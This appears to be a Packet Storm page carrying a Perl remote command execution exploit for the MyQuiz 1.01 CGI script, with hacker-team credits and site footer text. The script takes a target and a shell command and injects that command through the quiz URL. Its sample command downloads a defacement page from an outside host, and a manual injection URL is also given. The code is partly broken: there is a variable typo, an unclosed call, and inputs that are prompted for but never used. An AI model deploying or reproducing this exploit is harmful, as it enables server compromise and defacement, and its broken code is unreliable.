MyQuiz version 1.01 remote command execution exploit.
0a7cb4b6e0130e49d68b2a145976e7fbc68a64334f724b284c83c44452d1cf85This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit.
Athour : Hessam-x - www.hessamx.net
+IHST : iran hackerz security team (hackerz.ir)
#((Perl exploit))
#!/usr/bin/perl
# => MyQuiz Remote Command Execution Exploit
# -> By Hessam-x / www.hackerz.ir
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|
# Iran Hackerz Security Team
# Hessam-x : www.hessamx.net
use LWP::Simple;
print "Target(www.example.com)\$ ";
chomp($targ = <STDIN>);
print "path: (/cgi-bin/)\$ \n";
chomp($path=<STDIN>);
print "command: (wget www.hackerz.ir/deface.htm)\$ \n";
chomp($comd=<STDIN>);
$page=get("http://".$targ.$patch) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."\;".$comd."\|"
print "[+] Exploiting request done!\n";
print "Enjoy !";
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed